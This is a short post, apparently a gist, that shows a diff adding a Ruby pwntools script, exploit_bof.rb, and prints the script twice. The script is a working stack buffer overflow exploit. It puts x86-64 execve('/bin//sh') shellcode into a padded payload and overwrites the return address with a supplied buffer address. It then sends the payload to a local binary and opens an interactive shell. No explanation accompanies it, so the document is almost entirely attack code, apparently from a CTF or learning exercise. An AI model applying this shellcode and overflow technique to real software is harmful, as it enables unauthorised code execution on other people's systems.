hnts · September 27, 2020 04:45
diff --git a/exploit_bof.rb b/exploit_bof.rb
 # encoding: ASCII-8BIT
 require 'pwn'

 size = ARGV[0].to_i
 buf_addr = ARGV[1].to_i(16)
 shellcode = "\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05"

 payload = shellcode
 payload += 'A' * (size - payload.size)
 payload += 'A' * (8 - payload.size%8)
 payload += 'AAAAAAAA' * 2
 payload += p64(buf_addr)

 s = Tubes::Process.new('./a.out')
 s.sendline(payload)
 s.interact
	# encoding: ASCII-8BIT
	require 'pwn'

	size = ARGV[0].to_i
	buf_addr = ARGV[1].to_i(16)
	shellcode = "\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05"

	payload = shellcode
	payload += 'A' * (size - payload.size)
	payload += 'A' * (8 - payload.size%8)
	payload += 'AAAAAAAA' * 2
	payload += p64(buf_addr)

	s = Tubes::Process.new('./a.out')
	s.sendline(payload)
	s.interact